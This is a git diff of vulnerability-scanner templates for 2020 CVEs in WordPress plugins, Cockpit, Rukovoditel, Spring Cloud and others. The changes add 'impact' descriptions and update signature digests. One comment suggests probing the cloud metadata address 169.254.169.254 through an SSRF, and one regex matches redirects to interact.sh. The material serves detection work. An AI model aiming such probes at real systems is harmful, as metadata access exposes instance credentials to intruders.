diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml
index b502afd09b..ab447c3ee1 100644
--- a/http/cves/2020/CVE-2020-35749.yaml
+++ b/http/cves/2020/CVE-2020-35749.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: high
   description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.
   remediation: |
     Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ef36102138875ecedadc1006b8872372f13e0619ccc53dd0ad1018da935c2c16022100c9be99e41b78e0b07f9609b799659ba23bcdabd2887c778645a0532cc421a3cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f6d6407035de713c670783388d1ee2a60b9b3233ab5aa1529606875ad176a4d702202cad89d58c0a0c99df9bcd948d4a968db2a90caa4d7c4e405cca25a2dece41d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml
index 429e8afad3..04af26fb6c 100644
--- a/http/cves/2020/CVE-2020-35774.yaml
+++ b/http/cves/2020/CVE-2020-35774.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.
   remediation: |
     Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fd3b7c6a7349a3e0ed8804f2fed23c87c2ce59f9924fc77f0e570e3e9d874c2e02210089c6e2b2b9c8fb00aaee67fdb744f0b141874eee8e5633b3a57605cde4493c63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e6aa57b76c0236b67430b4ff847b39442332bb52e1b31497f86fb12deaeaea2c022100b1940b746707ca056bbdb8b211cfdfe84e84429a2c05e49f0fcb4f98b58beb19:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml
index ccf4ffbf92..a282eb46a8 100644
--- a/http/cves/2020/CVE-2020-3580.yaml
+++ b/http/cves/2020/CVE-2020-3580.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability.
   reference:
@@ -50,5 +52,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100aa61564a1b2cf11bf06cc0063875869afb8ea6e85cf79dc37e8553d7b0982873022100d8d04418a0d4f867d50783111b41365abae95ce2fcae243619f55c01d3448ced:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022046aead00280f46381eb429dc15e269865a7dd00501f324c94dc84e8c2f71afa002210090311a8c7bc2ffbfb0069c043d73ec78d8cc4289712f90fb95a88abe63ff15dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml
index 2418579231..245c5c1018 100644
--- a/http/cves/2020/CVE-2020-35846.yaml
+++ b/http/cves/2020/CVE-2020-35846.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220442eb04f7548ef401ccc64c5ccca884be63e3534f60e0abfed2b33e7dd2cd3b5022075fc083c16850d4918a6a2fcdec7319f7af8baee5f3870654b260cc0f123ce09:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205160d1f6260d371ee2c0405e08031150b30933078da05827e82a68eb3e42835602201d96a23f157a7be53e7411de76133aad1204f6fe5a6999abc55fe4c3a80bcea4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml
index d0678db672..495374ecbc 100644
--- a/http/cves/2020/CVE-2020-35847.yaml
+++ b/http/cves/2020/CVE-2020-35847.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service.
   remediation: |
     Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.
   reference:
@@ -71,4 +73,4 @@ http:
         negative: true
         regex:
           - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'
-# digest: 4a0a0047304502200f3a4ebb2cc9ece0cfd40344cce9e871cdd492f6abb5c6e85354fdf06e5c79a0022100a0f1454645137a367765bce666340d33183101b3277637f43df3cb4f301752f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022020f14d0d1e670e33b2505e287ad78389a0265122b10472733c747abdfc09ab680220680ef629ded3bb7352a34584cfd826ff18c837bf6a93ec4611ace409f97ea643:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml
index bd2138c0b1..58744d98df 100644
--- a/http/cves/2020/CVE-2020-35848.yaml
+++ b/http/cves/2020/CVE-2020-35848.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to manipulate database queries, potentially leading to unauthorized access, data leakage, or data corruption.
   remediation: |
     Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         regex:
           - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
-# digest: 4a0a00473045022100e2a6b76dbc68ac85648cc995b963f5c245de43cca928ac295cb75422e05bf37d022066462c8749489e6f594688cd905ccf0c01bd5c722c4f9f32703c8c02c64251a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b58cbfd07bffb1e5aaeb82a93873e84ec3da56a3ca7ef982914e54831470d3a802204072287282347e4b558418b94c10246162118371db473b3adc4ec2c57663ff0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml
index 9d32e63b83..3271793a4e 100644
--- a/http/cves/2020/CVE-2020-35951.yaml
+++ b/http/cves/2020/CVE-2020-35951.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
+  impact: |
+    This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
   remediation: |
     Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
   reference:
@@ -72,4 +74,4 @@ http:
           - not found in <b>([/a-z_]+)wp
         internal: true
         part: body
-# digest: 4a0a00473045022073dd3c0edd6de07e6680791bb9e2df37417402ed894e70d48710da2f8cfd33a2022100826b9f215de7a8ab30f9dad7583dad3dee0066b98e767d0468dec75a6ef5d2bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022026c40268ae33ad65ae71e913134cae9241f5064173f5008c29126505d3275f7302206d1e281d1f2ed0cf27fce004b69f6c37f5a4f10fd39196f2bf4edcc4c7c456d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml
index 4b37b676a0..ee43a1e51e 100644
--- a/http/cves/2020/CVE-2020-35984.yaml
+++ b/http/cves/2020/CVE-2020-35984.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a00473045022100e5e495732402154e49f85144b6f33bd5f5a64eab416555b47264091083fe2c7202200a89f7824192f56efe314af8e6e8a40412d6a18d385eaf7bcbc2b6b91859a1ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206d707f3303d78df61f93271e8a4848cc7c7479470fba510ff0d8ef2f6d064b2d0220082d612ac5dbc615cc75444848c329a9e5eaa6a0e05743e64ee31fb398e6f1c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml
index daf85ffb20..49dd7f35c0 100644
--- a/http/cves/2020/CVE-2020-35985.yaml
+++ b/http/cves/2020/CVE-2020-35985.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4b0a00483046022100c0d9eba07308acae9ef7d72963ea21b63295a907915f63bf80d4751ff9948dad022100c4b9de73fc08253277eb9e3db63fc93c0985be534ec134bedf9d21e415768fa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204e0b2178a9dce1caa35e3cad3c01a1c0518d28535106aa23032106b64fad7038022100d364b8c4a3a5df84b0cbc8667e7f27dc2b44c6e944724a137c9a0d243105dc9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml
index 5ea91728d8..1387bdfe6d 100644
--- a/http/cves/2020/CVE-2020-35986.yaml
+++ b/http/cves/2020/CVE-2020-35986.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a004730450220140a9534a0edaa0d41aa833909ef690680f457cc547db252005bcdd1f2e353f4022100ae093b3252ece8dcb80df2028bb2a5040f80b7ba6a2d28c017aca672bb7e9210:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008470d7247e1dd3fad45d9f3b8b00fa0f58e123efadca802a60c98ad735473966022100ff530001ca333ed3b37d4607dc85cfc49db5275ff803e73689deab6cb6652b90:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml
index 9915fe7b65..b79fba21c5 100644
--- a/http/cves/2020/CVE-2020-35987.yaml
+++ b/http/cves/2020/CVE-2020-35987.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4b0a00483046022100c4b9fed2b6d5845091f3aaa906919608bf10165a868041fdb40a1d9c0c66fca902210093abd3989ee0ef4be1b9150df8808380433dc3fb48d88eb46563a46ef97188cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f5da033dc497b3813f1890bfe576a2e14765f1ab3a84d69b3f83472ea233d29e022100dff6c57ffd67bf8a6386d13340d9aad49dd80e7e8a4ef7dd488628beb30d2394:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml
index d425ab1e85..5ad1e5b374 100644
--- a/http/cves/2020/CVE-2020-36289.yaml
+++ b/http/cves/2020/CVE-2020-36289.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
+  impact: |
+    An attacker can gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022037b7ed602b24763fe94efe67459621f88845040bcee708fd36197c88b3c54c73022032c5e0f77e55b3e73efa9b8ad4a4ed9ad55f67d3261a686208da70f6d90d9b32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022007e05ca594a28f65eba65a4cd1535db8fbad197cb6d2665e8affafc7fa37ccbe02207e1adadf386b1e885e757dea81bd8d6b18e4b8f1a639b0f5108a6499b74727a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml
index b7d3621dac..b1b1856d0f 100644
--- a/http/cves/2020/CVE-2020-36365.yaml
+++ b/http/cves/2020/CVE-2020-36365.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100fb02bafea28e6f4985055367a21cdf7dab1bb98d08d9db3216a602294d8a03520220796dfa053956dcf4c10aab48f31872e30b8597aef1cf3029f0843ac0ad684688:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206390dcf1910433f266013b25856ca3385a21230c410fad42199167d6d9ca9bf20221008f98356f1082316e37e9425ed5f51605164f22d380f4eadae82c146ef5736eb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml
index 9aac7e6265..f1d9dbff70 100644
--- a/http/cves/2020/CVE-2020-36510.yaml
+++ b/http/cves/2020/CVE-2020-36510.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022024ad31e0c94ac97f7f6c0661727d2f32b39c639ea4194e93699c9dbe284507fe022100ec5dadea18df3b0eb1bfb196350ae6ef6d184e4dab154bb45ee19219718c0e96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa3461ef3ac43e55f5af913220946f741d1b5fddc3c9b1bfe95c6d37dd8ef420022100d024239fc8ea03ac674da2d50e64c362019cecc8e6cce78ee3891c0ba69e834b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml
index 72c99fd159..99c51c5642 100644
--- a/http/cves/2020/CVE-2020-4463.yaml
+++ b/http/cves/2020/CVE-2020-4463.yaml
@@ -9,6 +9,8 @@ info:
     XML external entity injection (XXE) attack when processing XML data.
     A remote attacker could exploit this vulnerability to expose
     sensitive information or consume memory resources.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive information or a denial of service.
   remediation: |
     Apply the latest security patches or updates provided by IBM to mitigate the vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
         part: header
         words:
           - "application/xml"
-# digest: 4a0a004730450220690c1c60068f1f111bbc4e36d024056984e670dd9457bc578f66cc338de81f750221008235e21898a98a230c98305ce972e9b74d39290021b27f8091e966601985f4c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022024a6fa769124fc65ecdee3026e1373ea3cd5a5392a7865a68d06e745b4bbf3ef022100e32e12f6cf95a0626e93efad2d08b0ae6dee27090521033269a499f2f42723fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml
index 6e456a7b08..9b0b1a5645 100644
--- a/http/cves/2020/CVE-2020-5191.yaml
+++ b/http/cves/2020/CVE-2020-5191.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -60,4 +62,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022074f691bc1123462a2b4a106c4e772cd97ad412d5cac0e67df523777d76115e240221008a6f17072c6ff0ca4cbf5a0b98b4bde2469724c3fb221e49c2d8c9508bed9659:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008a79adbf6b2d1f6038e258d2092bfd606cc2a7a4143f1cb31eef2e6423f19f480220400e745374bcb855e1ce85d81a2a75626eaffee41be9cf911efb65948132992b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml
index 5fafb8d5fe..0549e17bb3 100644
--- a/http/cves/2020/CVE-2020-5192.yaml
+++ b/http/cves/2020/CVE-2020-5192.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207b4819707a64e706d571e66fb0c005c3d3ec01ed33f7717f7622a17df44f959d022100f552e5e40d3342a0d110b9aa4ac9a1973065c9ef05296f61e56d1e171169f6fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100da710f52a626e2e870364f00c0b9129a2bcf15585aa8942ca53940c7ad90e7fb022100e64ed41654ac143d3582667854ee0f1f669b10917b3a3d44a3e914969c1587ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml
index 2da92ad686..5c6c723e6d 100644
--- a/http/cves/2020/CVE-2020-5284.yaml
+++ b/http/cves/2020/CVE-2020-5284.yaml
@@ -5,6 +5,8 @@ info:
   author: rootxharsh,iamnoooob,dwisiswant0
   severity: medium
   description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: This issue is fixed in version 9.3.2.
   reference:
     - https://github.com/zeit/next.js/releases/tag/v9.3.2
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a1288f67fc593962d0293b4d69bb105842433b6ac50ac09eb77c7be9b706fa0002206f0083fec1e6f68ac582afbd0d07bd27ecb924ea9aa046fc47b27a73701fc6c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fdbe70c7fe48ba90fcf69bf83937581be7bce8492537c654f0ec227a3bb01b300221008351ca03bd54b83ea06acf93e1bc2d40fea8cab1a71dd7e3afdf0b6ad3dd913f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml
index c346c1bc86..e91e989bda 100644
--- a/http/cves/2020/CVE-2020-5307.yaml
+++ b/http/cves/2020/CVE-2020-5307.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4b0a00483046022100cadf83e745ef9ceed35bc540e5b4bd5cce80bbf7e58f96c001c9a946e478f798022100ee78d838b857a20a00f2ba3adcaf74b992f343b1af1b6e83ffa77f522fb69864:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009adf44c89342998524a3213ee5114ff22e1a5ebe1b818781b79481c73e45718e022048026ce9b8cd7c6e302c2e057f63a92df005284f8a5387e2ef657ec0784513ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml
index 4bc834a402..85238b71d2 100644
--- a/http/cves/2020/CVE-2020-5405.yaml
+++ b/http/cves/2020/CVE-2020-5405.yaml
@@ -5,6 +5,8 @@ info:
   author: harshbothra_
   severity: medium
   description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
   remediation: |
     Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022002c88a6fbe0fd36e42620e3f6d7d4ea9d72ed776ec984599e77345bb057342e2022100f9d56936961822f9bd1a4350d8f990e91c3f3f36e2c35b405ea2a129b3b6255e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a54afc7c94f34e7d3e580c3be013a46b0c579d6da632f9e643f6c5ce3435e57e022048fcaad30b2d18835c534f35a144039d9de5afc3cdea7bdb7101d831bd92de38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml
index ce82109034..88cd4a5de6 100644
--- a/http/cves/2020/CVE-2020-5410.yaml
+++ b/http/cves/2020/CVE-2020-5410.yaml
@@ -5,6 +5,8 @@ info:
   author: mavericknerd
   severity: high
   description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c1a6fd69670bf4e3cbc62ba42bdb745031af5214f9c317659048c0dd8a4666f802203954c243845e37a8527572a0f55697b67c8922e26f4a8461af7063e3e1684cad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cbabd7d2fccd105aeb882cf20488c56256ed17b7adbe54f2829427aca98e825802206fb5a184ecf8bc154f5f372d5408cac876353f3088798b4d8f7a9fea43672b0b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml
index 6e21ad51a7..d6ccf3db15 100644
--- a/http/cves/2020/CVE-2020-5412.yaml
+++ b/http/cves/2020/CVE-2020-5412.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation.
   remediation: |
     Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 200
 
 # To get crithit, try http://169.254.169.254/latest/metadata/
-# digest: 490a0046304402202433cc040fc8dbb0f5b1242f3372c133e0c263c0cb56b356cdc0c14961ad66df02206e70e26390a552bab5ae2913079d13ed4024e6cfc3bedd707f1df0b6e7b4991e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
